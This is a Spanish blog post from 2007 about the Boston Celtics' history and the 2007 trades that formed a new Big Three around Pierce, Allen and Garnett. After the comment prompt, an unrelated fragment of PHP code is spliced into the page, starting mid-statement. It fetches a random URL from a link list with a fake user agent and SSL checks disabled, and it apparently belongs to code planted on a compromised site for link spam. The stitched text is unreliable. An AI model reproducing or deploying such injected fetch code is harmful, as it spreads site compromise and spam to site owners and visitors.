Boston Celtics: la larga espera (1ª parte)

23 de November de 2007 por Jabho

Dicen que la infancia es la patria del hombre. Mi infancia, y por tanto mi patria, baloncestística se remonta a los años 80 cuando Trecet empezó a acercarnos a las estrellas. Fueron los años de los Lakers y los Celtics, de Bird y Magic. Aquellos duelos, aquella rivalidad, hicieron que me enamorara de este deporte. Engancharon y dividieron a los aficionados ¿Por qué los Celtics? No lo sé y dudo que haya alguna razón. Hoy por hoy, no entonces, admito que el Showtime fue mejor. La grandeza de tu rival da más gloria a tus victorias.

Magic y Bird, jugadores de leyenda, se enfrentaron por primera vez en la final de la NCAA del 79 para luego entrar juntos a la liga. Desde entonces, cada temporada siguió el guión de una película del oeste, donde el aficionado esperaba impaciente el gran duelo final. No defraudaron. Sin embargo la espalda de Bird y la enfermedad de Magic hicieron que ambos se retiraran demasiado pronto, privándonos de un lento y dulce ocaso y preservando en nuestra memoria su juego en su mejor momento.

¿Por qué lo Celtics? No lo sé, pero desde entonces mi patria baloncestística son el verde, Red Auerbach, los tréboles, el parquet del Garden y, sobre todo, Larry Bird.

Han pasado 20 largos años desde que Bird nos dejó un poco huérfanos con su retirada. Dos décadas de malas decisiones y algo de mala de suerte. Por diferentes motivos nombres como Rick Pittino, merecerá un artículo aparte, o Len Bias, entre otros, han impedido que Boston volviera a la elite. Los Angeles o Detroit que ganaron anillos después que Boston han vuelto a ganarlos antes. Demasiadas temporadas en las que la plantilla no hacía honor a la historia de un equipo que ha ganado al menos un anillo en todas las décadas desde los 50 salvo en los 90. Demasiadas decepciones para los aficionados y, lo que es peor, demasiados años en los que no ha habido ni la ilusión por lograr algo importante.

Danny Ainge llegó a Boston en el año 2003. Las dos temporadas anteriores a su llegada el equipo había jugado final y semifinal de conferencia. Tras su llegada Ainge decide traspasar a una de las estrellas del equipo, Antonie Walker, y empezar así una época de transición y reconstrucción. Dos temporadas cayendo en primera ronda, una sin alcanzar los Playoffs y, por fin, la temporada pasada, Boston acabó con una marca de 24 victorias y 58 derrotas, el segundo peor registro de toda su historia. Con la sensación de haber tocado fondo Paul Pierce, estrella y capitán del equipo, pidió el traspaso.

Desde su llegada a Boston, Ainge se había mostrado incapaz de mejorar el equipo que encontró. Ni los traspasos realizados ni los agentes libres fichados han sido suficientes para subir el nivel de la plantilla. Su mejor aportación estos años han sido sus elecciones en los drafts, en las que ha sabido encontrar talento con elecciones entre la mitad de la primera ronda y el principio de la segunda. Por esta vía llegaron al equipo Al Jefferson, Ryan Gomes, Gerald Green, Rajon Rondo, Tony Allen o Delonte West. El azar, ése que un día nos privó de contar con Duncan, hizo que en el sorteo del draft del 2007 Boston, con la segunda peor marca de la liga, no contara con uno de los dos primeros picks sino con el 5. Posiblemente Ainge tenia la idea de seguir construyendo en torno a Oden o Durant. Posiblemente, pero tuvo que cambiar de rumbo.

Y el cambio de rumbo fue radical. En lugar de apostar por jóvenes y seguir construyendo paso a paso, logró vestir de verde a dos All-Star de la liga: Ray Allen y Kevin Garnett. Estos junto a Paul Pierce forman el nuevo Big Three. Palabras mayores. Varias de las jóvenes promesas de la franquicia, entre ellos Al Jefferson -más realidad que promesa-, así como futuras elecciones de primeras rondas, han sido el precio por conseguir dos estrellas absolutamente consagradas, pero en la treintena. El tiempo da y quita razones, pero de momento lo cierto es que en Boston se vuelve hablar de baloncesto, y que al hablar de baloncesto se habla de los Celtics.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>